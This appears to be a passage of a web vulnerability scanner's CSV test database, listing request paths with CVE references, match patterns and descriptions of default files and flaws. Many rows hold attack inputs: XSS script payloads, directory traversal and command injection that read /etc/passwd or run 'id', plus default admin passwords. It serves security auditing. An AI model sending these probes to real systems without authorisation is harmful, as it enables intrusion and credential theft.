"002884","CWE-552","2","/servlet/sqlcdsn","GET","401","","","","","Netware SQL connector found. All default code should be removed from web servers.","","" "002885","CWE-552","2","/servlet/webacc","GET","200","","","","","Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.","","" "002886","CWE-552","2","/servlet/webpub","GET","200","","","","","Netware Web Publisher found. All default code should be removed from web servers.","","" "002887","CWE-552","2","/WebSphereSamples","GET","200","","","","","Netware Webshere sample applications found. All default code should be removed from web servers.","","" "002888","CWE-552","2","@CGIDIRScgi-test.exe","GET","200","","","","","Default CGI found","","" "002934","CWE-552","2","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse","GET","SERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002935","CWE-552","2","/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002936","CVE-2002-1634","2","/netbasic/websinfo.bas","GET","Company:","","Revision:\sNetWare","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002937","CWE-552","2","/perl/env.pl","GET","HSERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002938","CWE-552","2","/perl/samples/env.pl","GET","HSERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002939","CWE-552","2","/perl/samples/lancgi.pl","GET","Lan Boards","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002940","CWE-552","2","/perl/samples/ndslogin.pl","GET","Fullname","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002941","CWE-552","2","/perl/samples/volscgi.pl","GET","Novell","","200","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002942","CWE-552","2","/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse","GET","SERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","","" "002943","CWE-552","2","/index.html.ca","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002944","CWE-552","2","/index.html.cz.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002945","CWE-552","2","/index.html.de","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002946","CWE-552","2","/index.html.dk","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002947","CWE-552","2","/index.html.ee","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002948","CWE-552","2","/index.html.el","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002949","CWE-552","2","/index.html.en","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002950","CWE-552","2","/index.html.es","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002951","CWE-552","2","/index.html.et","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002952","CWE-552","2","/index.html.fr","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002953","CWE-552","2","/index.html.he.iso8859-8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002954","CWE-552","2","/index.html.hr.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002955","CWE-552","2","/index.html.it","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002956","CWE-552","2","/index.html.ja.iso2022-jp","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002957","CWE-552","2","/index.html.kr.iso2022-kr","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002958","CWE-552","2","/index.html.ltz.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002959","CWE-552","2","/index.html.lu.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002960","CWE-552","2","/index.html.nl","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002961","CWE-552","2","/index.html.nn","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002962","CWE-552","2","/index.html.no","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002963","CWE-552","2","/index.html.po.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002964","CWE-552","2","/index.html.pt","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002965","CWE-552","2","/index.html.pt-br","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002966","CWE-552","2","/index.html.ru.cp-1251","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002967","CWE-552","2","/index.html.ru.cp866","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002968","CWE-552","2","/index.html.ru.iso-ru","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002969","CWE-552","2","/index.html.ru.koi8-r","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002970","CWE-552","2","/index.html.ru.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002971","CWE-552","2","/index.html.se","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002972","CWE-552","2","/index.html.tw","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002973","CWE-552","2","/index.html.tw.Big5","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002974","CWE-552","2","/index.html.var","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" "002975","CWE-552","2","/test","GET","test hierarchy","","","","","Apache Tomcat default file found. All default files should be removed.","","" "002976","CVE-1999-0739,MS99-013","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be removed.","","" "002977","MS99-013","2","/iissamples/issamples/ixqlang.htm","GET","Query Language","","","","","IIS default file found. All default files should be removed.","","" "002978","CVE-1999-1451,MS99-013","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file that should be removed.","","" "002979","CVE-1999-0739,MS99-013","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file that should be removed.","","" "002980","CVE-1999-0739,MS99-013","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file that should be removed.","","" "002981","CVE-1999-1451,MS99-013","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.","","" "002982","CWE-552","2","/mc-icons/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" "002983","CWE-552","2","/ns-icons/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" "002984","CWE-552","3","@CGIDIRSprintenv","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","","" "002985","CWE-552","3","@CGIDIRSprintenv","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431.","","" "002986","CWE-552","3","@CGIDIRStest-cgi","GET","PATH_TRANSLATED","","","","","Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.","","" "002987","CWE-552","3","@CGIDIRStest-cgi","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.","","" "002988","CWE-552","3","/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E","GET","Edit Database","","","","","Oracle admin page may reveal passwords in a prebuilt form and reveal database information.","","" "002989","CWE-552","3","@PHPINFODIRS@PHPINFOFILES","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","","" "002993","CWE-552","b","/NetDetector/middle_help_intro.htm","GET","NIKSUN-HELP","","","","","The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html","","" "002994","CWE-552","b","/a/","GET","200","","","","","May be Kebi Web Mail administration menu.","","" "002995","CWE-552","b","/basilix/","GET","200","","","","","BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'","","" "002996","CWE-552","b","/bottom.html","GET","Topaz Prism","","","","","Topaz Prism appears to be running, try login with admin/admin.","","" "002997","CWE-552","b","/interchange/","GET","200","","","","","Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.","","" "002998","CWE-552","b","/sca/menu.jsp","GET","Service Control Agent","","","","","Entrust GetAccess Service Control Agent is installed.","","" "002999","CWE-552","b","/","SEARCH","Length Required","","","","","WebDAV is installed.\n",";","" "003000","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/icons/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003001","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/manual/images/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003002","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/com/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003003","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/COM/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003004","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/doc/packages/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003005","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/image/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003006","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/javax/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003007","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/perl/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003008","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/scripts/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003009","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/SUNWmc/htdocs/en_US/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory found. This is likely a Sun Solstice installation.","","" "003010","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/search/inc/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. This is likely Sun One Webserver 6.1 search.","","" "003011","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/images/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003012","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","3","/docs/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003013","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","3","/examples/","GET","Directory Listing","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","Directory indexing found.","","" "003014","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","3","/style/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003015","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","3","/styles/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003016","OSVDB-3280","3","/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS).","","" "003017","CVE-2003-1211","4","/search.asp?Search=\"><script>alert(Vulnerable)</script>","GET",">\<script\>alert\(\)\<\/script\>","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS).","","" "003018","OSVDB-3282","8","/uploader.php","GET","200","","","","","This script may allow arbitrary files to be uploaded to the remote server.","","" "003019","CVE-1999-1451,MS99-013","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not.","","" "003022","CVE-1999-1451,MS99-013,MSKB:Q231368","6","/iissamples/exair/howitworks/Winmsdp.exe","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server.","","" "003023","CVE-2002-1079","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" "003024","CVE-2002-1079","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[windows\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" "003025","CVE-2002-1081","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request.","","" "003026","CVE-2002-1081","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request.","","" "003027","CVE-2002-1081","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request.","","" "003028","CVE-2002-1081","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request.","","" "003029","CVE-2002-1078","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Abyss 1.03 reveals directory listing when multiple /'s are requested.","","" "003030","https://securitytracker.com/id/1008158","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003031","https://securitytracker.com/id/1008158","4","/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003032","OSVDB-3295","4","/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003033","OSVDB-3295","4","/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003034","OSVDB-3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","><script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003035","OSVDB-3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003036","OSVDB-3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003037","OSVDB-3296","4","/theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" "003038","CVE-2003-0492","4","/search.asp?Search=","GET",">\<script\>alert\(Vulnerable\)\<\/script\>","","","","","Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS).","","" "003039","CVE-2002-1660 https://securiteam.com/securitynews/5IP0B203PI/","8","@FORUMcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution.","","" "003040","CVE-2002-1660 https://securiteam.com/securitynews/5IP0B203PI/","8","@VBULLETINcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution.","","" "003045","CVE-2000-0709","6","/_vti_bin/","GET","shtml\.dll","shtml\.exe","","","","shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).","","" "003047","CVE-2001-0241","6d","/NULL.printer","GET","Error in web printer install","","","","","Internet Printing (IPP) is enabled. Some versions have a buffer overflow/DoS in Windows 2000 that allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. Disabling the .printer mapping i","","" "003048","CVE-2002-0576","3","/nul..cfm","GET","The template specification","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","","" "003049","CVE-2002-0576","3","/nul..dbm","GET","The template specification","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","","" "003050","CVE-2002-0576","3","/nul.cfm","GET","The requested file","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","","" "003051","CVE-2002-0576","3","/nul.dbm","GET","The requested file","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","","" "003053","CVE-1999-0951","8","@CGIDIRSimagemap","GET","200","","","","","imagemap.exe was found. Many versions from different vendors contain flaws.","","" "003054","CVE-1999-0951","8","@CGIDIRSimagemap.exe","GET","200","","","","","imagemap.exe was found. Many versions from different vendors contain flaws.","","" "003055","CVE-2000-0122","3","@CGIDIRShtimage.exe/path/filename?2,2","GET","tried the following","","","","","htimage.exe can provide physical path of web server. BID-964. BID-1141.","","" "003056","CVE-2000-0256","d","@CGIDIRShtimage.exe","GET","200","","","","","htimage.exe may be vulnerable to a buffer overflow in the mapname portion. MS00-028. BID-1117","","" "003057","CVE-1999-0068","7","/mlog.html","GET","200","","","","","Remote file read vulnerability 1999-0068","","" "003058","CVE-1999-0068","7","/mlog.phtml","GET","200","","","","","Remote file read vulnerability 1999-0068","","" "003059","CVE-1999-0068","7","/mylog.html?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0068","","" "003060","CVE-1999-0068","7","/mylog.phtml?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0068","","" "003061","CVE-1999-0068","7","/php/mlog.html","GET","200","","","","","Remote file read vulnerability 1999-0346","","" "003062","CVE-1999-0068","7","/php/mlog.phtml","GET","200","","","","","Remote file read vulnerability 1999-0346","","" "003063","CVE-1999-0068","7","/php/mylog.html?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","","" "003064","CVE-1999-0068","7","/php/mylog.phtml?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","","" "003065","CVE-1999-0068","7","/fi?/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","","" "003069","CVE-2000-0538 BID-1314.","d","/CFIDE/administrator/index.cfm","GET","PasswordProvided","cfadminPassword","","","","ColdFusion Administrator found. ColdFusion 4.5.1 and earlier may have an overflow by submitting a 40k character password.","","" "003070","CVE-2002-0434","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution.","","" "003071","CVE-2002-1034,CVE-2002-1033","7","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","","" "003072","CVE-2002-1034,CVE-2002-1033","7","/content/base/build/explorer/none.php?/etc/passwd","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","","" "003073","BID-4290 CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/","3","/soapConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found.","","" "003074","CVE-2001-0320","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version.","","" "003075","CVE-2001-0320","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version.","","" "003076","CVE-2002-0341","3","@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA","GET","SYS:","","","","","Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.","","" "003077","CVE-2002-0341","7","/GW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" "003078","CVE-2002-0341","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" "003079","CVE-2002-0341","7","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" "003080","CVE-2002-0341","7","@CGIDIRSGWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" "003081","CVE-2003-0624","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code.","","" "003082","BID-4290 CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/","3","/XSQLConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found.","","" "003083","CVE-2002-0375","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS).","","" "003084","CVE-2003-0801","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nokia Electronic Documentation is vulnerable to Cross Site Scripting (XSS).","","" "003085","CVE-2003-0802","3","/docs/NED?action=retrieve&location=.","GET","docs\\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path.","","" "003086","CVE-2001-1212","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS).","","" "003087","CVE-2001-1233","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.","","" "003088","CVE-2002-0705","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available.","","" "003089","CVE-1999-1376","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed.","","" "003090","CVE-1999-1052","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms.","","" "003091","CVE-1999-1052","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms.","","" "003092","CVE-1999-1052","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms.","","" "003093","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","7","/scripts/tools/getdrvrs.exe","GET","200","","","","","MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution.","","" "003094","OSVDB-3513","7","@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd","GET","root:","","","","","WebBBS by Darryl Burgdorf is vulnerable to command execution.","","" "003095","CVE-2002-1628","7","@CGIDIRSvote.cgi","GET","200","","","","","Mike's Vote CGI contains a bug which allows arbitrary command execution (version 1.2).","","" "003096","OSVDB-3515","7","@CGIDIRSquizme.cgi","GET","200","","","","","Mike's Quiz Me! CGI contains a bug which allows arbitrary command execution (version 0.5).","","" "003097","CVE-2002-0240 BID-4057","3","/","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed.","","" "003098","CVE-2003-0243","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely.","","" "003099","CVE-2003-0243","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely.","","" "003100","CVE-2003-0243","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely.","","" "003101","CVE-2003-0243","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely.","","" "003102","CVE-2003-0243","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely.","","" "003103","CVE-2002-0710","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent.","","" "003104","CVE-2002-0503","7","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","GET","boot loader","","","","","Citrix CGI allows directory traversal.","","" "003105","CVE-2000-1209","2","/proxy/ssllogin?user=administrator&password=administrator","GET",">administrator<","","","","","Compaq Web-Based Management allows login with ID/pass 'administrator'/'administrator'.","","" "003106","CVE-2000-1209","2","/proxy/ssllogin?user=administrator&password=operator","GET",">operator<","","","","","Compaq Web-Based Management allows login with ID/pass 'operator'/'operator'.","","" "003107","CVE-2000-1209","2","/proxy/ssllogin?user=administrator&password=user","GET",">user<","","","","","Compaq Web-Based Management allows login with ID/pass 'user'/'user'.","","" "003108","CVE-2002-0612","7","@CGIDIRSFileSeek.cgi?head=&foot=;cat%20/etc/passwd","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","","" 